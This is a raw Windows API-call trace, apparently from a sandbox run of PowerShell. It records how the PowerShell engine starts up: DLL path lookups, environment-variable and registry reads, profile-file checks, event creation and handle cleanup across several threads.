	[0609.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.674] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0610.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.674] CoTaskMemFree (pv=0x2913d0) 
	[0610.680] VirtualQuery (in: lpAddress=0xcb8b0, lpBuffer=0xcc770, dwLength=0x30 | out: lpBuffer=0xcc770*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0611.454] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.454] CoTaskMemFree (pv=0x2913d0) 
	[0611.455] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.455] CoTaskMemFree (pv=0x2913d0) 
	[0611.456] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.456] CoTaskMemFree (pv=0x2913d0) 
	[0611.457] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.458] CoTaskMemFree (pv=0x2913d0) 
	[0611.462] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.462] CoTaskMemFree (pv=0x2913d0) 
	[0611.463] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0611.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.463] CoTaskMemFree (pv=0x2913d0) 
	[0615.695] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0615.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.695] CoTaskMemFree (pv=0x2913d0) 
	[0616.989] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x291810
	[0616.990] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x291920
	[0622.852] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0622.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.852] CoTaskMemFree (pv=0x291a30) 
	[0622.856] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0622.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.856] CoTaskMemFree (pv=0x291a30) 
	[0623.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9b8 | out: phkResult=0xcd9b8*=0x39c) returned 0x0
	[0623.910] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd93c, lpData=0x0, lpcbData=0xcd938*=0x0 | out: lpType=0xcd93c*=0x1, lpData=0x0, lpcbData=0xcd938*=0x56) returned 0x0
	[0623.910] CoTaskMemAlloc (cb=0x5a) returned 0x1b9876b0
	[0623.910] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd90c, lpData=0x1b9876b0, lpcbData=0xcd908*=0x56 | out: lpType=0xcd90c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd908*=0x56) returned 0x0
	[0623.910] CoTaskMemFree (pv=0x1b9876b0) 
	[0623.910] RegCloseKey (hKey=0x39c) returned 0x0
	[0623.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9b8 | out: phkResult=0xcd9b8*=0x39c) returned 0x0
	[0623.910] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd93c, lpData=0x0, lpcbData=0xcd938*=0x0 | out: lpType=0xcd93c*=0x1, lpData=0x0, lpcbData=0xcd938*=0x56) returned 0x0
	[0623.910] CoTaskMemAlloc (cb=0x5a) returned 0x1b9876b0
	[0623.910] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd90c, lpData=0x1b9876b0, lpcbData=0xcd908*=0x56 | out: lpType=0xcd90c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd908*=0x56) returned 0x0
	[0623.911] CoTaskMemFree (pv=0x1b9876b0) 
	[0623.911] RegCloseKey (hKey=0x39c) returned 0x0
	[0623.915] CoTaskMemAlloc (cb=0x20c) returned 0x1b950970
	[0623.916] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b950970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0623.917] CoTaskMemFree (pv=0x1b950970) 
	[0623.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0623.917] CoTaskMemAlloc (cb=0x20c) returned 0x1b950970
	[0623.917] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b950970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0623.917] CoTaskMemFree (pv=0x1b950970) 
	[0623.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0623.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0623.920] SetErrorMode (uMode=0x1) returned 0x1
	[0623.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd920 | out: lpFileInformation=0xcd920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0623.921] SetErrorMode (uMode=0x1) returned 0x1
	[0623.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0623.921] SetErrorMode (uMode=0x1) returned 0x1
	[0623.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd920 | out: lpFileInformation=0xcd920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0623.921] SetErrorMode (uMode=0x1) returned 0x1
	[0623.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0623.921] SetErrorMode (uMode=0x1) returned 0x1
	[0623.921] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd920 | out: lpFileInformation=0xcd920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0623.921] SetErrorMode (uMode=0x1) returned 0x1
	[0623.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0623.922] SetErrorMode (uMode=0x1) returned 0x1
	[0623.922] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd920 | out: lpFileInformation=0xcd920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0623.922] SetErrorMode (uMode=0x1) returned 0x1
	[0623.925] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.925] CoTaskMemFree (pv=0x291a30) 
	[0623.926] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.926] CoTaskMemFree (pv=0x291a30) 
	[0623.928] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.929] CoTaskMemFree (pv=0x291a30) 
	[0623.931] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.931] CoTaskMemFree (pv=0x291a30) 
	[0623.937] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.937] CoTaskMemFree (pv=0x291a30) 
	[0623.938] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x308
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2fc
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0623.939] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0623.941] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0623.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.942] CoTaskMemFree (pv=0x291a30) 
	[0624.995] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0624.995] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcdb00 | out: lpMode=0xcdb00) returned 1
	[0624.996] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0624.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0624.996] CoTaskMemFree (pv=0x291a30) 
	[0624.999] SetEvent (hEvent=0x310) returned 1
	[0624.999] SetEvent (hEvent=0x308) returned 1
	[0624.999] SetEvent (hEvent=0x2fc) returned 1
	[0624.999] SetEvent (hEvent=0x30c) returned 1
	[0625.001] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0625.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.001] CoTaskMemFree (pv=0x291a30) 
	[0625.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd858 | out: phkResult=0xcd858*=0x360) returned 0x0
	[0625.002] RegQueryValueExW (in: hKey=0x360, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd7dc, lpData=0x0, lpcbData=0xcd7d8*=0x0 | out: lpType=0xcd7dc*=0x0, lpData=0x0, lpcbData=0xcd7d8*=0x0) returned 0x2

Thread:
	id = 353
	os_tid = 0xd30


Thread:
	id = 357
	os_tid = 0xe0c


Thread:
	id = 864
	os_tid = 0x13c0


Thread:
	id = 871
	os_tid = 0xc40


Thread:
	id = 877
	os_tid = 0x14d0


Thread:
	id = 917
	os_tid = 0x187c


Thread:
	id = 921
	os_tid = 0x1890

	[0497.274] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0564.276] LocalFree (hMem=0x297310) returned 0x0
	[0564.276] CloseHandle (hObject=0x328) returned 1
	[0564.276] CloseHandle (hObject=0x13) returned 1
	[0564.302] CloseHandle (hObject=0xf) returned 1
	[0564.303] RegCloseKey (hKey=0x310) returned 0x0
	[0564.303] RegCloseKey (hKey=0x30c) returned 0x0
	[0564.303] RegCloseKey (hKey=0x308) returned 0x0
	[0564.303] LocalFree (hMem=0x297360) returned 0x0
	[0564.303] RegCloseKey (hKey=0x330) returned 0x0
	[0585.894] RegCloseKey (hKey=0x330) returned 0x0
	[0597.717] RegCloseKey (hKey=0x330) returned 0x0
	[0614.830] RegCloseKey (hKey=0x398) returned 0x0
	[0614.831] RegCloseKey (hKey=0x394) returned 0x0
	[0614.831] RegCloseKey (hKey=0x370) returned 0x0
	[0614.831] RegCloseKey (hKey=0x3ac) returned 0x0
	[0614.831] RegCloseKey (hKey=0x38c) returned 0x0
	[0614.832] RegCloseKey (hKey=0x388) returned 0x0
	[0614.832] RegCloseKey (hKey=0x384) returned 0x0
	[0614.832] RegCloseKey (hKey=0x380) returned 0x0
	[0614.833] RegCloseKey (hKey=0x37c) returned 0x0
	[0614.833] RegCloseKey (hKey=0x378) returned 0x0
	[0614.833] RegCloseKey (hKey=0x374) returned 0x0
	[0614.833] RegCloseKey (hKey=0x34c) returned 0x0
	[0614.834] RegCloseKey (hKey=0x3a8) returned 0x0
	[0614.834] RegCloseKey (hKey=0x3a4) returned 0x0
	[0614.834] RegCloseKey (hKey=0x36c) returned 0x0
	[0614.834] RegCloseKey (hKey=0x368) returned 0x0
	[0614.835] RegCloseKey (hKey=0x364) returned 0x0
	[0614.835] RegCloseKey (hKey=0x360) returned 0x0
	[0614.835] RegCloseKey (hKey=0x35c) returned 0x0
	[0614.835] RegCloseKey (hKey=0x358) returned 0x0
	[0614.836] RegCloseKey (hKey=0x354) returned 0x0
	[0614.836] RegCloseKey (hKey=0x350) returned 0x0
	[0614.836] RegCloseKey (hKey=0x3a0) returned 0x0
	[0614.836] RegCloseKey (hKey=0x340) returned 0x0
	[0614.837] RegCloseKey (hKey=0x33c) returned 0x0
	[0614.837] RegCloseKey (hKey=0x338) returned 0x0
	[0614.837] RegCloseKey (hKey=0x328) returned 0x0
	[0614.838] RegCloseKey (hKey=0x310) returned 0x0
	[0614.838] RegCloseKey (hKey=0x30c) returned 0x0
	[0614.840] RegCloseKey (hKey=0x308) returned 0x0
	[0614.840] RegCloseKey (hKey=0x2fc) returned 0x0
	[0614.840] RegCloseKey (hKey=0x39c) returned 0x0
	[0614.841] RegCloseKey (hKey=0x330) returned 0x0
	[0642.040] RegCloseKey (hKey=0x360) returned 0x0
	[0700.080] CloseHandle (hObject=0x384) returned 1
	[0700.080] CloseHandle (hObject=0x394) returned 1
	[0700.081] CloseHandle (hObject=0x380) returned 1
	[0700.081] CloseHandle (hObject=0x370) returned 1
	[0700.081] CloseHandle (hObject=0x37c) returned 1
	[0700.082] CloseHandle (hObject=0x378) returned 1
	[0700.082] CloseHandle (hObject=0x34c) returned 1
	[0700.083] CloseHandle (hObject=0x374) returned 1
	[0700.083] CloseHandle (hObject=0x388) returned 1
	[0700.083] CloseHandle (hObject=0x360) returned 1
	[0783.613] CloseHandle (hObject=0x488) returned 1
	[0783.614] CloseHandle (hObject=0x438) returned 1
	[0783.614] CloseHandle (hObject=0x3dc) returned 1
	[0783.615] CloseHandle (hObject=0x3d8) returned 1
	[0783.615] CloseHandle (hObject=0x434) returned 1
	[0783.616] CloseHandle (hObject=0x374) returned 1
	[0783.616] CloseHandle (hObject=0x48c) returned 1
	[0783.616] CloseHandle (hObject=0x388) returned 1
	[0783.617] CloseHandle (hObject=0x360) returned 1
	[0904.675] CertFreeCRLContext (pCrlContext=0x1b98bf60) returned 1
	[0904.675] CertFreeCRLContext (pCrlContext=0x1b98bfe0) returned 1
	[0904.676] CertFreeCRLContext (pCrlContext=0x1ccedf30) returned 1
	[0904.676] CertFreeCRLContext (pCrlContext=0x1b98bf60) returned 1
	[0904.677] CertFreeCRLContext (pCrlContext=0x1ccedfb0) returned 1
	[0904.677] CloseHandle (hObject=0x3e4) returned 1
	[0904.678] CertCloseStore (hCertStore=0x1b96d050, dwFlags=0x0) returned 1

Thread:
	id = 949
	os_tid = 0x1968


Thread:
	id = 1238
	os_tid = 0x1958

	[0625.904] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0625.909] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0625.914] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0625.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.914] CoTaskMemFree (pv=0x291a30) 
	[0625.916] VirtualQuery (in: lpAddress=0x1c7dd700, lpBuffer=0x1c7de5c0, dwLength=0x30 | out: lpBuffer=0x1c7de5c0*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0625.924] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0625.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.924] CoTaskMemFree (pv=0x291a30) 
	[0625.936] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0625.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.936] CoTaskMemFree (pv=0x291a30) 
	[0626.753] CoTaskMemAlloc (cb=0x104) returned 0x291a30
